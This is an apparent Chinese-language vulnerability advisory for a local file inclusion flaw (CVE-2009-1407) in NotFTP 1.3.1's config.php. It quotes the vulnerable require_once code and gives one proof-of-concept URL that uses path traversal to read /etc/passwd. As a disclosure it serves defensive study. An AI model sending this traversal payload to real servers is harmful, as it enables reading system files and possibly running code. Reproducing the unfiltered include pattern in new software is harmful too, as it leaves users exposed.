NotFTP config.php本地文件包含漏洞


添加时间:
2009-05-08

系统编号:
WAVDB-01390
BugCVE: CVE-2009-1407
BUGTRAQ: 34636

影响版本:
NotFTP 1.3.1

程序介绍:

NotFTP是用PHP编写的基于Web的HTTP-FTP网关。

漏洞分析:

NotFTP的config.php脚本没有正确地过滤用户所提交的参数,如果远程攻击者在提交的URL请求中使用newlang参数指定了本地系统的恶意文件的话,就可能在Web服务器上读取敏感信息或执行任意代码。以下是config.php脚本中的有漏洞代码段:

 
  1. if (isset($newlang))   
  2. {   
  3.    require_once("lib/lang/".$languages[$newlang]["file"]);   
  4. }   
  5. elseif (isset($_COOKIE["notftplang"]))   
  6. {   
  7.    require_once("lib/lang/".$languages[$_COOKIE["notftplang"]]["file"]);   
  8. }   
  9. else  
  10. {   
  11.    require_once("lib/lang/".$languages[DEFAULTLANG]["file"]);   
  12. }   



漏洞利用:

http://site.pl/path/config.php?newlang=kacper&languages[kacper][file]=../../../../../etc/passwd

解决方案:
厂商补丁:

NotFTP
------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://sourceforge.net/projects/notftp/

信息来源:
<*来源:Kacper (kacper1964@yahoo.pl)

链接:http://www.milw0rm.com/exploits/8504
*>